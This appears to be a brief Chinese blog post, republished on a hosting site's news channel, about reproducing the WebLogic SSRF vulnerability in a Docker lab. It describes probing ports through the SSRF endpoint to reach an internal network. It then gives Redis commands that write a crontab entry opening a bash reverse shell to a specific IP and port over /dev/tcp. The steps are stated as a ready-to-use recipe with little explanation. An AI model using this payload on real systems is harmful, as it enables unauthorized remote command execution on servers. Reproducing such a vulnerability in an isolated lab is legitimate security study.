今天就跟大家聊聊有关如何实现Weblogic SSRF漏洞复现,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。
docker安装及搭建环境教程:https://www.freebuf.com/sectool/252257.html
访问7001端口
发现是个连接,这就可能存在ssrf了
访问不存在的端口返回 could not connect over HTTP
访问存在的端口返回状态码
访问内网
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n" config set dir /etc/ config set dbfilename crontab save
看完上述内容,你们对如何实现Weblogic SSRF漏洞复现有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注亿速云行业资讯频道,感谢大家的支持。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。
